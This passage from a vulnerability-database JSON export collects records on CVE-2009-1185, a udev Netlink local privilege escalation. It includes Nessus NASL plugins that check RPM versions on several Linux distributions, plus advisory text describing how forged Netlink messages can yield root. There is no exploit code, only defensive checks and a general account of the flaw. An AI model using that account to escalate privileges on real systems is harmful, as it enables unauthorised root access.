"cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-1185"], "modified": "2009-04-17T14:30:00", "id": "UDEVD", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/udevd", "sourceData": "", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2023-05-18T14:24:55", "description": "The remote OracleVM system is missing necessary patches to address critical security updates :\n\nCVE-2009-1185 udev before 1.4.1 does not verify whether a NETLINK message originates from kernel space, which allows local users to gain privileges by sending a NETLINK message from user space.\n\n - fix for CVE-2009-1185 (bug #495051)\n\n - Resolves: rhbz#495055\n\n - removed zaptel rules (rhbz #294061)\n\n - fixed segfault for empty lines in passwd (rhbz#413831)\n\n - added patch for iscsi ids (Daniel Berrange) (rhbz#427640)\n\n - added /etc/sysconfig/udev-stw, which makes MODULES configurable (Jeff Bastian) (rhbz#437979)\n\n - added ext4 support to vol_id (rhbz#444528)\n\n - updated dasd_id from dasdinfo of s390-tools-1.6.2 (rhbz#430532)\n\n - Resolves: rhbz#294061, rhbz#413831, rhbz#427640\n\n - Resolves: rhbz#437979, rhbz#444528, rhbz#430532\n\n - scsi_id, retry open on EBUSY (rhbz#450279)\n\n - Resolves: rhbz#450279\n\n - set selinux context for .udev dirs and symlinks (rhbz#442886)\n\n - fixed rule for hp iLO2 virtual mouse device (rhbz#429215)\n\n - Resolves: rhbz#429215, rhbz#442886\n\n - fixed selinux context setting for symlinks (rhbz#441054)\n\n - Resolves: rhbz#441054\n\n - fixed regression bug rhbz#430667 introduced by fix for rhbz#275441\n\n - Resolves: rhbz#275441\n\n - added rule for hp iLO2 virtual mouse device (rhbz#429215)\n\n - Resolves: rhbz#429215\n\n - fix for looping vol_id, because of a malformed passwd (rhbz#425941)\n\n - revised fix for tape devices (rhbz#231990)\n\n - Resolves: rhbz#425941, rhbz#231990\n\n - moved 'ignore_device' for dm devices to 90-dm.rules (rhbz#275441)\n\n - added cciss support (rhbz#250484)\n\n - support more than 10 nst devices in the persistent rules (rhbz#231990)\n\n - extra double check for symlinks improved (rhbz#217917)\n\n - Resolves: rhbz#217917, rhbz#231990, rhbz#250484, rhbz#275441\n\n - do not fail, if EEXIST on symlink (#217917)\n\n - Resolves: rhbz#217917\n\n - corrected rules for tape devices (#231990)\n\n - Resolves: rhbz#231990\n\n - removed pie link flag from static build flags\n\n - Resolves: rhbz#233956, rhbz#233307, rhbz#226997, rhbz#236242\n\n - Resolves: rhbz#217917, rhbz#231990\n\n - added RPM_OPT_FLAGS and pie to static build flags\n\n - Resolves: rhbz#233956, rhbz#233307, rhbz#226997, rhbz#236242\n\n - Resolves: rhbz#217917, rhbz#231990\n\n - do not fail, if EEXIST on mkdir (#217917)\n\n - configure process numbers dynamically according to CPU and MEM (#226997)\n\n - link statically (#236242, #233307)\n\n - fixed rule for raw1394 (#233956)\n\n - added persistent device names for tape devices (#231990)\n\n - Resolves: rhbz#233956, rhbz#233307, rhbz#226997, rhbz#236242\n\n - Resolves: rhbz#217917, rhbz#231990", "cvss3": {}, "published": "2014-11-26T00:00:00", "type": "nessus", "title": "OracleVM 2.1 : udev (OVMSA-2009-0006)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1185"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:oracle:vm:libvolume_id", "p-cpe:/a:oracle:vm:udev", "cpe:/o:oracle:vm_server:2.1"], "id": "ORACLEVM_OVMSA-2009-0006.NASL", "href": "https://www.tenable.com/plugins/nessus/79454", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from OracleVM\n# Security Advisory OVMSA-2009-0006.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(79454);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-1185\");\n script_bugtraq_id(34536);\n\n script_name(english:\"OracleVM 2.1 : udev (OVMSA-2009-0006)\");\n script_summary(english:\"Checks the RPM output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote OracleVM host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\nCVE-2009-1185 udev before 1.4.1 does not verify whether a NETLINK\nmessage originates from kernel space, which allows local users to gain\nprivileges by sending a NETLINK message from user space.\n\n - fix for CVE-2009-1185 (bug #495051)\n\n - Resolves: rhbz#495055\n\n - removed zaptel rules (rhbz #294061)\n\n - fixed segfault for empty lines in passwd (rhbz#413831)\n\n - added patch for iscsi ids (Daniel Berrange)\n (rhbz#427640)\n\n - added /etc/sysconfig/udev-stw, which makes MODULES\n configurable (Jeff Bastian) (rhbz#437979)\n\n - added ext4 support to vol_id (rhbz#444528)\n\n - updated dasd_id from dasdinfo of s390-tools-1.6.2\n (rhbz#430532)\n\n - Resolves: rhbz#294061, rhbz#413831, rhbz#427640\n\n - Resolves: rhbz#437979, rhbz#444528, rhbz#430532\n\n - scsi_id, retry open on EBUSY (rhbz#450279)\n\n - Resolves: rhbz#450279\n\n - set selinux context for .udev dirs and symlinks\n (rhbz#442886)\n\n - fixed rule for hp iLO2 virtual mouse device\n (rhbz#429215)\n\n - Resolves: rhbz#429215, rhbz#442886\n\n - fixed selinux context setting for symlinks (rhbz#441054)\n\n - Resolves: rhbz#441054\n\n - fixed regression bug rhbz#430667 introduced by fix for\n rhbz#275441\n\n - Resolves: rhbz#275441\n\n - added rule for hp iLO2 virtual mouse device\n (rhbz#429215)\n\n - Resolves: rhbz#429215\n\n - fix for looping vol_id, because of a malformed passwd\n (rhbz#425941)\n\n - revised fix for tape devices (rhbz#231990)\n\n - Resolves: rhbz#425941, rhbz#231990\n\n - moved 'ignore_device' for dm devices to 90-dm.rules\n (rhbz#275441)\n\n - added cciss support (rhbz#250484)\n\n - support more than 10 nst devices in the persistent rules\n (rhbz#231990)\n\n - extra double check for symlinks improved (rhbz#217917)\n\n - Resolves: rhbz#217917, rhbz#231990, rhbz#250484,\n rhbz#275441\n\n - do not fail, if EEXIST on symlink (#217917)\n\n - Resolves: rhbz#217917\n\n - corrected rules for tape devices (#231990)\n\n - Resolves: rhbz#231990\n\n - removed pie link flag from static build flags\n\n - Resolves: rhbz#233956, rhbz#233307, rhbz#226997,\n rhbz#236242\n\n - Resolves: rhbz#217917, rhbz#231990\n\n - added RPM_OPT_FLAGS and pie to static build flags\n\n - Resolves: rhbz#233956, rhbz#233307, rhbz#226997,\n rhbz#236242\n\n - Resolves: rhbz#217917, rhbz#231990\n\n - do not fail, if EEXIST on mkdir (#217917)\n\n - configure process numbers dynamically according to CPU\n and MEM (#226997)\n\n - link statically (#236242, #233307)\n\n - fixed rule for raw1394 (#233956)\n\n - added persistent device names for tape devices (#231990)\n\n - Resolves: rhbz#233956, rhbz#233307, rhbz#226997,\n rhbz#236242\n\n - Resolves: rhbz#217917, rhbz#231990\"\n );\n # https://oss.oracle.com/pipermail/oraclevm-errata/2009-April/000020.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f660381b\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libvolume_id / udev packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Linux udev Netlink Local Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(20);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:libvolume_id\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:udev\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:vm_server:2.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/04/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/04/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/26\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"OracleVM Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleVM/release\", \"Host/OracleVM/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/OracleVM/release\");\nif (isnull(release) || \"OVS\" >!< release) audit(AUDIT_OS_NOT, \"OracleVM\");\nif (! preg(pattern:\"^OVS\" + \"2\\.1\" + \"(\\.[0-9]|$)\", string:release)) audit(AUDIT_OS_NOT, \"OracleVM 2.1\", \"OracleVM \" + release);\nif (!get_kb_item(\"Host/OracleVM/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"OracleVM\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"OVS2.1\", reference:\"libvolume_id-095-14.20.el5_3\")) flag++;\nif (rpm_check(release:\"OVS2.1\", reference:\"udev-095-14.20.el5_3\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libvolume_id / udev\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:21:44", "description": "This update fixes a local privilege escalation in udev.\n\nCVE-2009-1185: udev did not check the origin of the netlink messages.\nA local attacker could fake device create events and so gain root privileges.", "cvss3": {}, "published": "2009-04-17T00:00:00", "type": "nessus", "title": "openSUSE 10 Security Update : libudev-devel (libudev-devel-6158)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1185"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:libvolume_id", "p-cpe:/a:novell:opensuse:libvolume_id-devel", "p-cpe:/a:novell:opensuse:udev", "cpe:/o:novell:opensuse:10.3"], "id": "SUSE_LIBUDEV-DEVEL-6158.NASL", "href": "https://www.tenable.com/plugins/nessus/36182", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update libudev-devel-6158.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(36182);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-1185\");\n\n script_name(english:\"openSUSE 10 Security Update : libudev-devel (libudev-devel-6158)\");\n script_summary(english:\"Check for the libudev-devel-6158 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes a local privilege escalation in udev.\n\nCVE-2009-1185: udev did not check the origin of the netlink messages.\nA local attacker could fake device create events and so gain root\nprivileges.\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libudev-devel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Linux udev Netlink Local Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(20);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libvolume_id\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libvolume_id-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:udev\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:10.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/04/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/04/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE10\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"10.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE10.3\", reference:\"libvolume_id-114-19.3\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"libvolume_id-devel-114-19.3\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"udev-114-19.3\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"udev\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:21:06", "description": "Updated udev packages that fix one security issue are now available for Red Hat Enterprise Linux 5.\n\nThis update has been rated as having important security impact by the Red Hat Security Response Team.\n\nudev provides a user-space API and implements a dynamic device directory, providing only the devices present on the system. udev replaces devfs in order to provide greater hot plug functionality.\nNetlink is a datagram oriented service, used to transfer information between kernel modules and user-space processes.\n\nIt was discovered that udev did not properly check the origin of Netlink messages. A local attacker could use this flaw to gain root privileges via a crafted Netlink message sent to udev, causing it to create a world-writable block device file for an existing system block device (for example, the root file system). (CVE-2009-1185)\n\nRed Hat would like to thank Sebastian Krahmer of the SUSE Security Team for responsibly reporting this flaw.\n\nUsers of udev are advised to upgrade to these updated packages, which contain a backported patch to correct this issue. After installing the update, the udevd daemon will be restarted automatically.", "cvss3": {}, "published": "2009-04-17T00:00:00", "type": "nessus", "title": "RHEL 5 : udev (RHSA-2009:0427)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1185"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:libvolume_id", "p-cpe:/a:redhat:enterprise_linux:libvolume_id-devel", "p-cpe:/a:redhat:enterprise_linux:udev", "cpe:/o:redhat:enterprise_linux:5", "cpe:/o:redhat:enterprise_linux:5.3"], "id": "REDHAT-RHSA-2009-0427.NASL", "href": "https://www.tenable.com/plugins/nessus/36177", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2009:0427. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(36177);\n script_version(\"1.31\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-1185\");\n script_bugtraq_id(34536);\n script_xref(name:\"RHSA\", value:\"2009:0427\");\n\n script_name(english:\"RHEL 5 : udev (RHSA-2009:0427)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated udev packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 5.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nudev provides a user-space API and implements a dynamic device\ndirectory, providing only the devices present on the system. udev\nreplaces devfs in order to provide greater hot plug functionality.\nNetlink is a datagram oriented service, used to transfer information\nbetween kernel modules and user-space processes.\n\nIt was discovered that udev did not properly check the origin of\nNetlink messages. A local attacker could use this flaw to gain root\nprivileges via a crafted Netlink message sent to udev, causing it to\ncreate a world-writable block device file for an existing system block\ndevice (for example, the root file system). (CVE-2009-1185)\n\nRed Hat would like to thank Sebastian Krahmer of the SUSE Security\nTeam for responsibly reporting this flaw.\n\nUsers of udev are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. After installing the\nupdate, the udevd daemon will be restarted automatically.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-1185\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2009:0427\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected libvolume_id, libvolume_id-devel and / or udev\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Linux udev Netlink Local Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(20);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:libvolume_id\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:libvolume_id-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:udev\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.3\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/04/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/04/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/04/17\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2009:0427\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", reference:\"libvolume_id-095-14.20.el5_3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", reference:\"libvolume_id-devel-095-14.20.el5_3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"udev-095-14.20.el5_3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"udev-095-14.20.el5_3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"udev-095-14.20.el5_3\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libvolume_id / libvolume_id-devel / udev\");\n }\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:26:00", "description": "It was discovered that udev did not properly check the origin of Netlink messages. A local attacker could use this flaw to gain root privileges via a crafted Netlink message sent to udev, causing it to create a world-writable block device file for an existing system block device (for example, the root file system). (CVE-2009-1185)\n\nAfter installing the update, the udevd daemon will be restarted automatically.", "cvss3": {}, "published": "2012-08-01T00:00:00", "type": "nessus", "title": "Scientific Linux Security Update : udev on SL5.x i386/x86_64", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1185"], "modified": "2021-01-14T00:00:00", "cpe": ["x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20090416_UDEV_ON_SL5_X.NASL", "href": "https://www.tenable.com/plugins/nessus/60570", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(60570);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-1185\");\n\n script_name(english:\"Scientific Linux Security Update : udev on SL5.x i386/x86_64\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that udev did not properly check the origin of\nNetlink messages. A local attacker could use this flaw to gain root\nprivileges via a crafted Netlink message sent to udev, causing it to\ncreate a world-writable block device file for an existing system block\ndevice (for example, the root file system). (CVE-2009-1185)\n\nAfter installing the update, the udevd daemon will be restarted\nautomatically.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind0904&L=scientific-linux-errata&T=0&P=1842\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?0c29e0ca\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected libvolume_id, libvolume_id-devel and / or udev\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Linux udev Netlink Local Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(20);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/04/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/08/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL5\", reference:\"libvolume_id-095-14.20.el5_3\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"libvolume_id-devel-095-14.20.el5_3\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"udev-095-14.20.el5_3\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:26:08", "description": "This update fixes a local privilege escalation in udev.\n\n - udev did not check the origin of the netlink messages. A local attacker could fake device create events and so gain root privileges. (CVE-2009-1185)", "cvss3": {}, "published": "2009-09-24T00:00:00", "type": "nessus", "title": "SuSE 11 Security Update : udev (SAT Patch Number 766)", 